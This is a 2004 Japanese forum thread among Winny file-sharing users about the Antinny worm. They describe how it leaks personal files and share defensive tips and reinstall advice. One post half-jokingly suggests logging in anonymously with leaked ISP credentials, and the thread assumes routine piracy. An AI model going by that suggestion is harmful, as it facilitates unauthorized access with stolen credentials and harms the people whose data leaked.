   ■   ■ ■ ■ ■ ■ ○  \/ζ ○   \_________
  ■   ■  ■■  ■■  |    | 旦 |
  ■■■■    ■    ■ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| 11月11日(木)

記念日: 世界平和記念日 退役軍人記念日(アメリカ合衆国) 配線器具の日
       Remembrance Day (イギリス) 電池の日 ジュエリーデー ピーナッツの日
       チーズの日 サッカーの日 くつしたの日,ペアーズディ,恋人達の日
       おりがみの日 西陣の日 下駄の日 鮭の日 ポッキー&プリッツの日
       もやしの日 煙突の日 きりたんぽの日 磁気の日 カリントウの日
       ライターの日 国祭日 (アンゴラ)

●サッカーの日
スポーツ用品メーカー・ミズノの直営店・エスポートミズノが制定。
サッカーが11人対11人で行うスポーツであることから。

●もやしの日
「1111」がもやしを4本並べたように見えることから。

●煙突の日
「1111」が煙突が4本立っているように見えることから。
81[名無し]さん(bin+cue).rar:04/11/11 22:07:04 ID:X+P3i5oI
WinnyFileDatabaseが死んじゃってる気がするんだけど…
82[名無し]さん(bin+cue).rar:04/11/11 22:17:21 ID:vhXwL9rM
いや、死んでない 存在する
83[名無し]さん(bin+cue).rar:04/11/11 22:23:25 ID:cTrygF5Y
>>81
そう、お前の心の中にだよ
84[名無し]さん(bin+cue).rar:04/11/11 22:24:25 ID:d+5AG1lF
ウホッ.scrフエタ(*´д`*)ハァハァ
85[名無し]さん(bin+cue).rar :04/11/11 22:36:28 ID:l4lB1jLi
やれやれ、ひでえなあこのウイルス・・・・
なんか彼女の写真とかあるし・・・
迷惑かけるなよ・・・。
素直にny用パソコン組めよ。
ファイルが圧倒的につながりにくくなったよ。
エロゲCGがほんとに以前の半分ぐらいの速度でしか
キャッシュがたまらない。
86[名無し]さん(bin+cue).rar:04/11/11 22:45:54 ID:VtD5gkeC
>エロゲCGがほんとに以前の半分ぐらいの速度でしか
プッ
87[名無し]さん(bin+cue).rar:04/11/11 22:48:53 ID:rCq6DPkx
>エロゲCGがほんとに以前の半分ぐらいの速度でしか
>キャッシュがたまらない。


なに このナマモノ
88[名無し]さん(bin+cue).rar:04/11/11 22:56:06 ID:PahE3BVI
|∀・)・・・・・コンニチハ〜
89[名無し]さん(bin+cue).rar:04/11/11 23:11:25 ID:z0hBKeNy
zip、lzh、rarファイルを解凍するときは、解凍ソフト「Lhaz」を使ってください。
以前にも言いました。でも私はLhazの作者じゃありません。
Lhazを使ってください。
解凍したいファイルを右クリック→閲覧
これだけで、636kb程度の珍妙なアプリケーションがあるかどうかが分かります。
あった場合は、ウイルスを選択→×ボタンを押す
で、先に削除してください。
90[名無し]さん(bin+cue).rar:04/11/11 23:18:12 ID:cTrygF5Y
しまった、ポッキーの日だからって浮かれてて気付かなかった
>>66激しく乙

>>88
(・∀・)コンニチワ!!
91[名無し]さん(bin+cue).rar:04/11/11 23:20:56 ID:1eo3xHO6
>>89
解凍レンジでもいいでしょ。
92[名無し]さん(bin+cue).rar :04/11/11 23:24:17 ID:l4lB1jLi
ちょっと前までエロゲCGには3割がた元祖キンタマが封入されていたんだよ
10月半ばごろから異様に少なくなった。ほとんどなくなったといってもいい。
22日放流だからそれに向けてウイルスへの恐怖感をぬぐっていたんだろうと思う。
93[名無し]さん(bin+cue).rar:04/11/11 23:44:02 ID:3OG6xIU7
へぇ〜、nyでファイルの流通を意図的に操作できるんだぁ〜
94[名無し]さん(bin+cue).rar:04/11/11 23:47:24 ID:8vLS/BtL
キンタマの時の消防士級のもあるけどもうみんな飽きてるな。2chらしいけど。笑

あの時、デスクトップファイルだけじゃなく.docや.xlsをかたっぱしから探してきて流したら面白いとか言われてたがそれが実現した
なら次のもやってくれ↓




293 名前:名無しさん@5周年[sage] 投稿日:04/11/06(土) 20:13:06 ID:HDbqvXV2
2chにフシアナで犯罪予告をカキコするとかされると最悪だな。

95[名無し]さん(bin+cue).rar:04/11/12 00:54:48 ID:FmKwyZB7
ファイルが圧倒的につながりにくくなったよ。
エロゲCGがほんとに以前の半分ぐらいの速度でしか
キャッシュがたまらない。
96[名無し]さん(bin+cue).rar:04/11/12 01:01:23 ID:bjSwfALB
>>95
単におまいが周囲から切断判定喰らいまくってるだけじゃね?
変なもん貯め込んでてさw
97[名無し]さん(bin+cue).rar:04/11/12 01:02:13 ID:J6deTRHB
既存のものをあらかた落とし終えたのでは?
98[名無し]さん(bin+cue).rar:04/11/12 01:30:17 ID:xaWZ7kpz
●もやしの日
「1111」がもやしを4本並べたように見えることから。
●煙突の日
「1111」が煙突が4本立っているように見えることから。
●鼻毛の日
「1111」が鼻毛を4本並べたように見えることから。
●陰毛の日
「1111」が陰毛を4本並べたように見えることから。
●パソコンの日
「1111」がバイナリを4本並べたように見えることから。
●勃起アゲの日
「1111」が勃起アゲが4本立っているように見えることから。
●ヤクザの日
「1111」が落とした指を4本並べたように見えることから。
●タイーホの日
「1111」が鉄格子のパイプを4本並べたように見えることから。
●1の日
「1111」が1を4本並べたように見えることから。
●三角旗の日
「1111」が左にたなびく三角旗が4本立っているように見えることから。
●覚醒剤の日
「1111」が使用済み注射針を4本並べたように見えることから。
99[名無し]さん(bin+cue).rar:04/11/12 02:41:56 ID:TylIku45
もう12日
100[名無し]さん(bin+cue).rar:04/11/12 02:44:34 ID:M80IjUaY

      」                            .l
      」              ,,,,ggglililililllllllllllllilillll。   」
      」             lilillllllllllllllllllllllllllllllllllll][   |
      」   __,,,,       ..lllllllll]゛゜ ^゛゛.lllllllllllllllll   .ll.
      」   ]llll,,,,_^)lll.    .lllllllllllll     〈llllllllllll][   |
      」 ^)lllllllllilillllg゚lllllll   .\"゜    .lllllllllllllllll    [
      」  .;][  ゚lllll!            .lllllllllllll][    ]
      」  ]「   〈]]            llllllllllllllll゛    [
      」  ゛   .;lili]           .llllllllllllllllll.     ]!
      」   .。g、^^^            ]llllllll[「゜     [
      」  ygllll[gg       __,,,,_          .lllllllg|
      」  ]]]llll゜__       〈llll][       .lllll]glllllllllili
      」  llllllll]]゚゚゚       ]llllllll[______,,,,,,,,,,,, ]llllllllllll^゜[
      」   .lllllr   ,,,,、   ]llllllllllllllllllllllllllllllll! ゚lllllllllll ]!
      」    ]llll[ggllllll][゜   ..lllllllllll(゚゚゚゚゚゚"^^^      」
      」    ^"゚lllll[^^^    .lllllllll[            ]!
      」   ,,ggggg、      ]lllllllll.     .;,,,,,,,,。   」
      」  .lllll9"゚lllll]l.     」llllllllllllllgglilililillllllllllllllll   ]!
      」    .;gllllllll[[      ^9llllllllllllllllllllllllllll[[[[[゛   ]
      」   .lllllllll"゜        ^^^゚゚゚゚゚^^^`、      ]!
      」    ]][、                      [
      」    lili]]                      .ll.
101[名無し]さん(bin+cue).rar:04/11/12 02:46:08 ID:ASxSulH2
よめねぇよ
102[名無し]さん(bin+cue).rar:04/11/12 03:10:59 ID:L42QpnUb
顧客データ流れてる人が居るね…ナムナム
103[名無し]さん(bin+cue).rar:04/11/12 03:23:56 ID:bjSwfALB
>>100
家具屋の中の人?
104[名無し]さん(bin+cue).rar:04/11/12 05:39:19 ID:HME3R7Gl
これからウィルスに感染しんでバックアップとってフォーマットしようとしてるんだけど
何かこれ以外でバックアップしておくことないですかね?

・メール、nyの設定データ
・自分のデータ
・IME辞書
・Kerio(FW)の設定データ
・その他ソフトのデータ

なんか忘れてそうなんですけど・・
忘れてないかちょっと心配だ・・・
105[名無し]さん(bin+cue).rar:04/11/12 05:54:31 ID:Ef8D0Txi
意外と忘れがちなのが、Documents and Settings以下のいろいろ
106[名無し]さん(bin+cue).rar:04/11/12 05:56:57 ID:HME3R7Gl
>>105
どうもありがとうです。
すっかり忘れてました。。。あぶないあぶない。。。
107[名無し]さん(bin+cue).rar:04/11/12 05:57:25 ID:KaysUFz9
ε=ε=ε=ε=ヾ(;◎_◎)ノ うわー
IDとパスのリストとか入ってる詰め合わせ引いてしまった・・・
ほかにもデジカメで撮ったヤバイ個人情報も入ってた
犯罪ひ使われる可能性もw
108[名無し]さん(bin+cue).rar:04/11/12 06:07:11 ID:FmKwyZB7
107の意見は納得できる。
107は頭のいいヤシだ。
107は性格もいいヤシだと思う。
107はきれるヤシだ。
漏れは107のようなヤシを友達にしたい。
とにかく107はすごいヤシだ。



109[名無し]さん(bin+cue).rar:04/11/12 06:33:40 ID:HTZxDMZF
IDとパス使ったらタイーホされるべ
110[名無し]さん(bin+cue).rar:04/11/12 06:50:24 ID:KaysUFz9
タイ━━━━||Φ|(|゚|∀|゚|)|Φ||━━━━ホ!!!!!!
されたくないから使わないわいw
もう消した関わって捕まりたくないから
111[名無し]さん(bin+cue).rar:04/11/12 06:54:20 ID:CufIWIUy
もちろん他人のを使ったら犯罪だけど、
プロバイダ接続パスワード、メールパスワードや
ヤフオク等のパスワードは再インスコ後全て替えるが吉。
112[名無し]さん(bin+cue).rar:04/11/12 07:09:26 ID:IgdL64fI
ispのアカウントのパスとIDがあるならさ
捨てpcから公衆電話で、そのispに成り済ましで繋げれば身元ばれずにすむんじゃん?

とか、厨房が行ってみるテスト
113[名無し]さん(bin+cue).rar:04/11/12 10:12:29 ID:PDraMnbC
漏れがよくバックアップ忘れるのはprogramfilesにある2ちゃんビュアーののログ
114[名無し]さん(bin+cue).rar:04/11/12 10:35:32 ID:5DB+x4Rr
ログ保存する場所変えればいいじゃない
115[名無し]さん(bin+cue).rar:04/11/12 10:46:27 ID:kJuJiCz+
私には好きな人がいます、で検索したら40くらいしかヒットしないんだけどこんなものなのかな?
116[名無し]さん(bin+cue).rar:04/11/12 12:40:43 ID:eVMBxjXd
ちょっと見ないうちに前スレ完走しやがった
流れ早すぎだよ
117[名無し]さん(bin+cue).rar:04/11/12 17:01:32 ID:Vj/bcudC
マイドキュメント(空白).scrって踏んだときにエラーメッセージが出たけど、
みんなも出たの?
118[名無し]さん(bin+cue).rar:04/11/12 18:51:09 ID:1vlVp0yR
>117
"踏んだ"人は出てるかもな
119[名無し]さん(bin+cue).rar:04/11/12 18:54:30 ID:5YuSWf5l
自分で(空白)とかいれてるんだから釣りだろ
120[名無し]さん(bin+cue).rar:04/11/12 19:00:09 ID:NOWMUCl3
>>117
混じれ酢。うん。でた。でも何も起こってない。
upフォルダみても自分のupしているファイルしかない。
upフォルダの数も増えていない。
なんだんだろうね。scr
121[名無し]さん(bin+cue).rar:04/11/12 19:32:50 ID:PDraMnbC
時限式じゃないの?と混じれ酢
122117:04/11/12 19:36:38 ID:Vj/bcudC
釣りじゃないんだ。ゴメンよ。
いや情報が少ないし、自分のPCにも兆候が見られないので
不安になって訊いてみた。
123[名無し]さん(bin+cue).rar:04/11/12 19:38:59 ID:7yrMbpd5
>>122
試しに12月12日へ時計を進めてみそ。
124[名無し]さん(bin+cue).rar:04/11/12 19:39:23 ID:Rpp7LzLK
これはもうダメかもわからんね
125[名無し]さん(bin+cue).rar:04/11/12 19:50:38 ID:3PdHkq1V
>>122
オレはあきらめてクリーンインスコしたよ。
先生にも反応しなかったけど、なんか気分わるいでしょ。
126[名無し]さん(bin+cue).rar:04/11/12 20:06:32 ID:NOWMUCl3
kousuke1さんありがとう。
きみのデスクトップ画像のおかげできれいな壁紙を勝手に更新してくれるソフトがわかりました!
探してたんですよぉ。
127[名無し]さん(bin+cue).rar:04/11/12 20:09:31 ID:poCRkLu3
[041104-1327][【もせ】音楽情報交換スレ【アルバム】][mpg][PV][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-2254][こどものおもちゃ][第080話][「も一度歌って3・2・1」][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041109-1123][[映画]][ガンダムV][-めぐりあい宇宙-.avi][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
128[名無し]さん(bin+cue).rar:04/11/12 20:09:32 ID:zDnHMhWD
>126
ここはお前の(ry
129[名無し]さん(bin+cue).rar:04/11/12 21:25:16 ID:Ef8D0Txi
>>117-125
>>12>>66
とにかく情報が少ない。upフォルダにないからといって安心できない。
NOD32で、Antinny.Gと識別されている以上、何らかの悪さはするのだろう
踏んだらクリーンインスコ、これ常識。(というか踏んだ時点で手遅れかもしれんが)
130[名無し]さん(bin+cue).rar:04/11/12 21:32:46 ID:nFNbiZCN
FTTHで踏んだ人はもうダメポ。   
131[名無し]さん(bin+cue).rar:04/11/12 21:38:36 ID:IgdL64fI
いちいち、感染→再インスコ じゃソフトの入れなおし及び設定とか面倒だよ
132[名無し]さん(bin+cue).rar:04/11/12 21:39:51 ID:S59G3RLm
今更だけど自分なりの検証結果を。>>117のやつを仮想マシンで見てみたが確認できたのはtxtとかを圧縮して
%windir%\system32\networkに放り込むのとUpFolderに追加するのまで確認した。
圧縮された書庫のファイル名にはちゃんと「私には〜」のが有ったから>>66の暗号化云々でほぼ間違いないかと
ついでに途中でwingoも作成してる。すぐに削除されてたからなんのためか分からんが
133[名無し]さん(bin+cue).rar:04/11/12 21:45:37 ID:isOJdyB7
wingoは収集ファイルの一時格納フォルダなのか
134[名無し]さん(bin+cue).rar:04/11/12 21:48:04 ID:zDnHMhWD
>131
感染しなきゃいいのさ
135[名無し]さん(bin+cue).rar:04/11/12 21:58:53 ID:XX8vgH3y
nyは究極のセキュリティホールって事でFA
136117:04/11/12 22:00:30 ID:Vj/bcudC
クリーンインスコ中(´・ω・`)
Upフォルダが最初から無い(作られてもいない)と言っても安心できないものなぁ。
つうかVAIOのシステムリカバリでクリーンインスコになるのだろうか。
137[名無し]さん(bin+cue).rar:04/11/12 22:00:56 ID:uZg8iFL0
>>131
そこでノートン先生の背後霊で出番ですよ
138[名無し]さん(bin+cue).rar :04/11/12 22:18:31 ID:LFj8TcKK
動画専門の俺はウイルスとは無縁な罠。
つまんね。いや良いことだけどさw
139[名無し]さん(bin+cue).rar:04/11/12 22:31:40 ID:bAcwRScJ
nyのフォルダを開くとReadme.htmlだけが青い文字になってた・・・
140[名無し]さん(bin+cue).rar:04/11/12 22:42:26 ID:7yrMbpd5
>>138
知らぬが仏にならないよう気をつけなよ。
141[名無し]さん(bin+cue).rar:04/11/12 22:56:20 ID:iazqKnov
>>139
それは単にウインドウズが圧縮したんじゃないのか?
142[名無し]さん(bin+cue).rar:04/11/12 22:58:57 ID:kFzeDybX
再インスコしたらマシンが軽い軽い(w
143138:04/11/12 23:13:05 ID:LFj8TcKK
>>140
脅さないでくれw
俺はただの動画集中エロ紳士なだけだ!

144[名無し]さん(bin+cue).rar:04/11/12 23:13:54 ID:prefMUbr
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] Owner [04-10-31](ファイル詰合せ).zip

仙台入り
145[名無し]さん(bin+cue).rar:04/11/12 23:18:04 ID:prefMUbr
仙台=w32.sillyp2p
146[名無し]さん(bin+cue).rar:04/11/12 23:24:24 ID:TKQnKhrU
すげーラッキーでした。
scr踏んだんですけどやはりエラーメッセージがでて、
わけわかんないままny続けてたんです。
uptxtに追加もないし。

>132
さんの報告見てあわてて検索→ハケーン!
よくよく調べてみたら以前調子が悪くなって放置していたny6.6の方に
追加されてました。

ラッキー・・・だったんすかねぇ?
147[名無し]さん(bin+cue).rar:04/11/12 23:36:52 ID:eoaJaN4/
そうおもっていればいいさ
148[名無し]さん(bin+cue).rar:04/11/13 00:27:21 ID:S2pE/4HC
winnyのフォルダをあちこちにいっぱい作ればいいんじゃない?
149[名無し]さん(bin+cue).rar:04/11/13 00:31:03 ID:OCraEASP
>>146
SP2を入れてますか?
多分入れてるよね
150146:04/11/13 00:33:48 ID:vBCMUY1T
>>149
SP2は入れてません。
151[名無し]さん(bin+cue).rar:04/11/13 00:38:20 ID:k79dFKUq
[PS2][Tool]DVDloader+PAR+XPL+HDL+α(iso).rar

お聞きしたいのですが、これのISOって大丈夫なんでしょうか?
152[名無し]さん(bin+cue).rar:04/11/13 00:43:18 ID:Fo8Rm4VF
>>151
アホ。
153[名無し]さん(bin+cue).rar:04/11/13 00:48:54 ID:qfo/1yJh
なんで印スコすら嫌がるやつが多いんだ?
あきらめて俺みたいny専用マシン組め。
154[名無し]さん(bin+cue).rar:04/11/13 02:09:32 ID:Q5bnnT6d
恐れ知らずのアニメスレ五人衆とは俺達の事よ
     ( =゚ω゚ )        ( ,,・∀・)
     / 92J ヽ       / aaL ヽ、
     | |    | |        |       | |
     | |    ヽヽ       | ‹ ヽ`∀´ › |
     .| |     ヽヽ(;`・ω・ )/´シスコン(___)
     | (´`c_,'` )∪JORO ヽ |   / )
     (_/   ヽ | |___.(⌒\___/ /
      | ROM ヽ、\   ~\______ノ|
   ____|    |ヽ、二⌒)        \
   |\ .|    ヽ\..|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||
   |  \ヽ、__  .|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.      \     \
155[名無し]さん(bin+cue).rar:04/11/13 16:42:56 ID:Su8X1c2+
なんつーかノートン系入れてる奴で引っかかる奴多いね。
新種だからあたりまえだけど、オレみたいに入れて無いほうが
常日頃から警戒してて感染することはないんだけどな
156[名無し]さん(bin+cue).rar:04/11/13 16:55:22 ID:+gClc/9f
安心しきってるのかな
157[名無し]さん(bin+cue).rar:04/11/13 18:16:06 ID:h48RDw9V
遅レスだがaviやmpgアイコン偽装のウィルスもあるからな・・・
158[名無し]さん(bin+cue).rar:04/11/13 18:28:25 ID:TvHm+tkn
流れてるSSを見るとファイル操作にファイラーを使用しているのは皆無だね。
普段アイコン非表示で処理してるから、アイコン偽装に騙されるって感覚がよく判らない。
159[名無し]さん(bin+cue).rar:04/11/13 18:32:24 ID:Lh7Mrq79
>>158
そうそう。ファイラー使えば、すぐ判るのにね。
160[名無し]さん(bin+cue).rar:04/11/13 19:05:02 ID:Lvr9JfLt
>>151
そんなもの。手を出さずに店で買え
161[名無し]さん(bin+cue).rar:04/11/13 19:09:12 ID:Lvr9JfLt
.CCD形式で保存されているものは、ウイルスバスターオンラインスキャンでも確認できない。
ダエモンツールズで起動してみて、はじめて、入ってるとわかる。
162[名無し]さん(bin+cue).rar:04/11/13 19:32:55 ID:DA9sy6GH
>>144
サポセンのIDとパスもあるね
カワイソウ・・・・
163[名無し]さん(bin+cue).rar:04/11/13 19:36:01 ID:+gClc/9f
>>161
そりゃそーだろ・・・
164[名無し]さん(bin+cue).rar:04/11/13 19:37:30 ID:gfWrJniB
iso形式ならマウントしなくても中身をチェックできるワクチン
があるけどな。CCDはどうだったかな?
165[名無し]さん(bin+cue).rar:04/11/13 19:48:07 ID:DwqqnAii
クーラースーツだろ
166[名無し]さん(bin+cue).rar:04/11/13 19:49:32 ID:DwqqnAii
ごめんなさい誤爆しました・・・
167[名無し]さん(bin+cue).rar:04/11/13 20:00:51 ID:LF2faXwN
億万?
168[名無し]さん(bin+cue).rar:04/11/13 21:02:01 ID:qtncxEf2
mp3しか落とせない俺が真のチキン
169[名無し]さん(bin+cue).rar:04/11/13 21:13:28 ID:PofjJ8+U
ダエモンって言っちゃったよ・・・
170[名無し]さん(bin+cue).rar:04/11/13 22:08:07 ID:Lvr9JfLt
>>163
おや、周知の事実でしたか。
私は最近知りました。ウィルススキャンは万能でないのですね。
171[名無し]さん(bin+cue).rar:04/11/13 22:13:06 ID:MmnXAjEz
釣りはやめろ
ウィルススキャンが万能だと思ってたなんて
172[名無し]さん(bin+cue).rar:04/11/13 22:15:27 ID:E3MQxI2x
週末の夜になると、一気に厨度が上昇するなぁ…
173[名無し]さん(bin+cue).rar:04/11/13 22:58:17 ID:axzPx6SK
>>170
釣りだろうけど・・・
ずっと前からテンプレに記載されてますよ・・・  >>7
174[名無し]さん(bin+cue).rar:04/11/14 03:25:20 ID:8SV0Lksu
Winnyp利用者ってどれくらいいるんだろう
175[名無し]さん(bin+cue).rar:04/11/14 06:29:52 ID:/eOMIHPn
>>174
ここにひとりいる。
176[名無し]さん(bin+cue).rar:04/11/14 08:54:18 ID:p6/IRHf1
だえもんツール最高!!!
177[名無し]さん(bin+cue).rar:04/11/14 10:09:40 ID:tw4xoMsG
だよもんツールだよもん
178[名無し]さん(bin+cue).rar:04/11/14 13:40:55 ID:EcFC/MEV
以下のhashコード発動によってスレッド上でwinny監視開始
import System;
import System.IO;
import System.Object;
import System.Text;

var download_txt = "E:\\download\\Winny2\\download.txt";
var argv = Environment.GetCommandLineArgs();
var ForAppending = 8

var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile(download_txt, ForAppending, true);

var ss = argv[1].split("\n");
var key;
for (key in ss){
var a = /^(.*?\.(zip|rar|lzh|avi|mpg|mp3)) .* ([a-f0-9]{32})/.exec(ss[key]);
if(a != null){
var fname = a[1];
var hash = a[3];
var finalout = fname + ",,0,0," + hash + ",1\n";

f.Write(finalout);
}
}

f.Close();

↑これニュー速にコピペされまくってるんだけど何?
179[名無し]さん(bin+cue).rar:04/11/14 13:48:00 ID:xwrAaDMQ
>>178
なんにもおきない
厨がプログラミング覚えて嬉しがってコピペしてるだけ

言語はVB.NET
コンパイルするかIISなら動作するが
180[名無し]さん(bin+cue).rar:04/11/14 14:07:29 ID:puXL80dp
ファイルを右クりするとエラーが出るんですが、
PCを窓から投げ捨てるべきでしょうか?
181[名無し]さん(bin+cue).rar:04/11/14 14:08:16 ID:Y+mWPxFi
>>180
網を用意するまで待て
182[名無し]さん(bin+cue).rar:04/11/14 15:14:36 ID:5Z4/+Gk0
>>178
何がしたいのかも分からんな
そんなローカルなパス指定も分からん
183[名無し]さん(bin+cue).rar:04/11/14 17:57:35 ID:9oHJFoNN
なんかこの手のワームって原理的にup0にしとけば情報の流出が防げるような気がするんだけど・・・
それじゃ駄目なのかな。
184[名無し]さん(bin+cue).rar:04/11/14 18:00:20 ID:p6/IRHf1
そうすると、nyそのものが成立しなくなるのでは・・・?w
185[名無し]さん(bin+cue).rar:04/11/14 18:04:03 ID:uRF9bc30
Eドライブdaemonだからどうでもいいやw
186[名無し]さん(bin+cue).rar:04/11/14 18:08:39 ID:Wz6orWfc
Cドライブでnyか。凄いな。
187[名無し]さん(bin+cue).rar:04/11/14 18:18:28 ID:2Kqns0+G
Dだろ
188[名無し]さん(bin+cue).rar:04/11/14 18:25:00 ID:XyxIUbbi
じゃぁDVD(CD)ドライブはついてないってことか?
それともわざわざデーモンの仮想ドライブの次にパスつけてんのか?
189[名無し]さん(bin+cue).rar:04/11/14 18:35:07 ID:9UFoPpcj
daemonをダエモンとかデーモンとか言ってる香具師ども。

読み方はダイモンなんだよ。
190 :04/11/14 18:36:06 ID:jOUR6bpU
西部警察
191[名無し]さん(bin+cue).rar:04/11/14 18:38:12 ID:Tf0/rEci
決め打ち仕様か
192[名無し]さん(bin+cue).rar:04/11/14 18:43:40 ID:NS7w3aET
193[名無し]さん(bin+cue).rar:04/11/14 19:14:10 ID:QR7ZdONm
UpFolder.txtを読み取り専用とかじゃダメなの?
194[名無し]さん(bin+cue).rar:04/11/14 19:18:55 ID:yT4XIY0A
Cドライブでnyすると何か悪いの?
195[名無し]さん(bin+cue).rar:04/11/14 19:19:31 ID:ysxrtv9P
196[名無し]さん(bin+cue).rar:04/11/14 20:01:35 ID:0/4LvpEJ
>>194 CドライブをOSとnyで取り合ったら効率悪いし、
HDD死亡率がグンと上がりそう。OSごと死ぬよりny専用ドライブだけ
死んでくれた方が復旧も楽だし。
197[名無し]さん(bin+cue).rar:04/11/14 20:04:19 ID:gnUTYdqv
ていうか外付けの方が何かと便利
198[名無し]さん(bin+cue).rar:04/11/14 20:07:20 ID:+RKKy0yt
ていうかHDDなんぞ壊れない
199[名無し]さん(bin+cue).rar:04/11/14 20:09:51 ID:NS7w3aET
>>195
発音記号をよーく読んでみそ。
まあ、外来語にはむりやり日本語発音をこじつけてるから、
正直どれでもいいんだがな。

エネルギーとエナジーみたいなもんで、通用したもの勝ち。
200[名無し]さん(bin+cue).rar:04/11/14 20:13:09 ID:l46JibpL
>>197
おいおい
キャッシュが外付けなんぞしてたらころす

IEEE1394やUSB2はATA100にはおいついてない
201[名無し]さん(bin+cue).rar:04/11/14 20:17:11 ID:48r2nyY6
>>193
今のところその対策は有効だと思われるが、
ウイルスに属性変えられたりすれば何の意味も無くなるぞ。

俺はUpFolder.txtを監視するプログラム作って監視させてる。
直接キャッシュフォルダにぶち込まれたりしたら終わりだがw
202[名無し]さん(bin+cue).rar:04/11/14 20:39:06 ID:48r2nyY6
>>200
IEEE1394で十分だろ?
UATA100対応のHDDは1秒間に100MB転送出来ると勘違いしてないか?

7200rpmのHDDでも70MBpsが精一杯。さらにnyなんてやれば断片化
しまくるから速度は極端に落ちる。

USB2.0の最高速度は60MBpsだし、IEEE1394でも50MBps。
まぁ、どちらも理論値だからこれだけ速度が出ることは無いと思うがな。

それでもny用途としてはかなり実用的だと思うが。
203[名無し]さん(bin+cue).rar:04/11/14 20:39:55 ID:NS7w3aET
>>200
HD自体の転送速度がATA100に追いついていなかったり、回線
スピードに至っては言わすもがなってのは、華麗にスルーです
かそうですか。
204[名無し]さん(bin+cue).rar:04/11/14 20:42:19 ID:QR7ZdONm
>>201
その手があったか!
監視プログラムは有効そうだねぇ。

>>直接キャッシュフォルダにぶち込まれたりしたら終わりだがw

なるほど。ご指摘の通り。
悩ましい問題ですな....
205[名無し]さん(bin+cue).rar:04/11/14 21:25:37 ID:fm3zm0YF
>201
初代キンタマで既存のUpfolder.txtに記述されたフォルダに
詰合せぶち込まれたがそれには無力n…・・・あ、フォルダからUpしてないのか
206[名無し]さん(bin+cue).rar:04/11/14 21:51:12 ID:XvK+gCgq
普段はなんにも記述されてないUpfolder.txtを
読み取り専用にしておくだけでは駄目なのかな?
面倒だけどUpしたいファイルをキャッシュに変換する時だけ
パス記述されたUpfolder.txtに置き換えてるんだけど。
207[名無し]さん(bin+cue).rar:04/11/14 22:12:33 ID:XnIX5X8v
解析したいんですが、Antinyが入ってるファイルとか分かりませんか?
別に違法ファイルをDLしたい訳じゃないんで;;
208[名無し]さん(bin+cue).rar:04/11/14 22:23:22 ID:5Z4/+Gk0
>>206
既に トロイによって Winny.ini の書き換えも可能な状況においては
Upfolder.txtなんて、何しても無駄。
209[名無し]さん(bin+cue).rar:04/11/14 22:25:44 ID:jlpu7ERy
>>206
少し上のレスすら読めない池沼の方ですか?

>>207
失せろ
210[名無し]さん(bin+cue).rar:04/11/14 23:21:55 ID:82STFTsv
>>207
お前には無理
211[名無し]さん(bin+cue).rar:04/11/14 23:40:07 ID:48r2nyY6
分かった。キンタマを防ぐには、Winny.iniとUpFolder.txtを監視すればいいわけだ。
あとは問題のキャッシュフォルダだが・・・。

Cacheフォルダに対するWinny以外のアプリケーションの書き込みを監視することは
出来ないのか?

>>207
答えてくれたらウイルスの確実な入手方法を教えてやるよ。
212[名無し]さん(bin+cue).rar:04/11/14 23:42:35 ID:ytWzxgUV
>>202
bpsとbyte/sがごっちゃになってませんかね?
100Mbps=100/8=12.5MByte/s

HDDが70Mbpsだと今の光回線(100Mbps)なんて…
213[名無し]さん(bin+cue).rar:04/11/14 23:46:51 ID:svuikL6N
>>212
202はMBpsと書いてるからMByte/sで書いてるでは。
USB2.0 60MBps = 480Mbps
214[名無し]さん(bin+cue).rar:04/11/14 23:50:29 ID:svuikL6N
>>211
特定のファイルを監視するより、プログラムの起動を監視する
ようなものを作ったほうがいいような気がする…
215[名無し]さん(bin+cue).rar:04/11/15 00:05:42 ID:5cd8RkKq
そこでSSMですよ
216[名無し]さん(bin+cue).rar:04/11/15 00:07:06 ID:qQKcWm4V
nyの関係ファイルだけ監視してても無駄。
詰め合わせの放流手段はnyだけとは限らない。
217[名無し]さん(bin+cue).rar:04/11/15 00:11:39 ID:gN1mF2R4
>>213
そっか。大文字のときはByteなんだっけか。
あってたね。すまん >202
218[名無し]さん(bin+cue).rar:04/11/15 00:18:56 ID:v0QQo+nu
なんだ、話をまとめるとnyをやめろということか?
219[名無し]さん(bin+cue).rar:04/11/15 00:25:21 ID:fVmhzwC6
その方が平和かもしれない、てことです
220[名無し]さん(bin+cue).rar:04/11/15 00:26:03 ID:BEeuu+u5
OS再インスコする時に既存のパーティションを全部削除して
新しくパーティション作ってそこにインスコしたんだけど
これでフォーマットした事になってる?

変なの踏んでregeditがメモ帖になったから
再インスコしたんだけど
上書きじゃなくて、きれいさっぱりに掃除出来たのか不安
221[名無し]さん(bin+cue).rar:04/11/15 00:45:54 ID:v0QQo+nu
>>220
セットアップ中に表示される文章をよく嫁。

パーティション消すとパーティション上の
データは全て消えるから大丈夫。
222[名無し]さん(bin+cue).rar:04/11/15 00:53:39 ID:BEeuu+u5
>>221
ありがとう

数十Gのデータが消えるにしては、あまりに一瞬過ぎたから
本当に消えたのか不安だったんだ
223[名無し]さん(bin+cue).rar:04/11/15 00:57:52 ID:hW+7FvOR
まあ実際には消えてないんだけど、新しく入れなおしたOSからは認識されなくなるので問題なし。
224[名無し]さん(bin+cue).rar:04/11/15 01:50:05 ID:PkHA/SXY
>>211
キンタマ防ぐんだったらキンタマ対応のアンチウィルスソフト常駐しときゃ良いじゃん
225[名無し]さん(bin+cue).rar:04/11/15 04:59:43 ID:EwrxQLic
質問スレでないのに申し訳ないんだけど、ちょっとお知恵を拝借したい。

【使用OS】winXP プロフェッショナル
【WindowsUpdateしてるか】自動ダウンロードのやつは全部してる。
【AntiVirusは】avast
【ちゃんとUpdateしてるか】自動でなる。手動でしたら「すでに最新」とでた。
【スキャンした結果】何も発見できず。
【オンラインスキャンしたならその結果は】トレンドオンライン 検出なし。
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量は】2ヶ月弱、62メガバイトくらい。
【テンプレを読んだか】読んだ。
【テンプレにある対策を実行したか】どの対策したらいいかわかんない。
【症状を具体的に、分かる限りすべて書く】nyを起動したときに、キャッシュの一部が消える。
【何をしたらそんなことになったのか】気がついたらなってた。
【これまでにとった措置】
